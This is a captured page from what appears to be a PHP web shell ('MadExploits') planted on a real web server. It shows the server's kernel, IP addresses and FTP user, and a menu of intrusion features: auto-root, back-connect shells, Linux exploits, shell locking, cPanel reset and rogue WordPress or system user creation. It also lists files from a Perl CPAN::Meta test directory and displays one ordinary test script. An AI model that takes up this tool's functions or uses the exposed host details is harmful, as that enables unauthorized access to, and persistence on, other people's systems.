Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-CPAN-Meta /
t /
[ HOME SHELL ]
Name
Size
Permission
Action
data-fail
[ DIR ]
drwxr-xr-x
data-fixable
[ DIR ]
drwxr-xr-x
data-test
[ DIR ]
drwxr-xr-x
data-valid
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
parse-cpan-meta
[ DIR ]
drwxr-xr-x
00-report-prereqs.dd
7.88
KB
-rw-r--r--
00-report-prereqs.t
5.46
KB
-rw-r--r--
README-data.txt
622
B
-rw-r--r--
converter-bad.t
2.72
KB
-rw-r--r--
converter-fail.t
1.16
KB
-rw-r--r--
converter-fragments.t
4
KB
-rw-r--r--
converter.t
10.42
KB
-rw-r--r--
load-bad.t
805
B
-rw-r--r--
merge.t
5.74
KB
-rw-r--r--
meta-obj.t
6.62
KB
-rw-r--r--
no-index.t
1.82
KB
-rw-r--r--
optional_feature-merge.t
3.2
KB
-rw-r--r--
prereqs-finalize.t
2.24
KB
-rw-r--r--
prereqs-merge.t
2.37
KB
-rw-r--r--
prereqs.t
3.65
KB
-rw-r--r--
repository.t
4.39
KB
-rw-r--r--
save-load.t
3.67
KB
-rw-r--r--
validator.t
1.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : load-bad.t
use strict; use warnings; use Test::More 0.88; use CPAN::Meta; use File::Spec; use IO::Dir; sub _slurp { do { local(@ARGV,$/)=shift(@_); <> } } delete $ENV{PERL_YAML_BACKEND}; delete $ENV{PERL_JSON_BACKEND}; delete $ENV{CPAN_META_JSON_BACKEND}; delete $ENV{CPAN_META_JSON_DECODER}; my $data_dir = IO::Dir->new( 't/data-fixable' ); my @files = sort grep { /^\w/ } $data_dir->read; for my $f ( sort @files ) { my $path = File::Spec->catfile('t','data-fixable',$f); ok( eval { CPAN::Meta->load_file( $path ) }, "load_file('$f')" ) or diag $@; my $string = _slurp($path); my $method = $path =~ /\.json/ ? "load_json_string" : "load_yaml_string"; ok( eval { CPAN::Meta->$method( $string, { fix_errors => 1 } ) }, "$method(slurp('$f'))" ) or diag $@; } done_testing; # vim: ts=2 sts=2 sw=2 et:
Close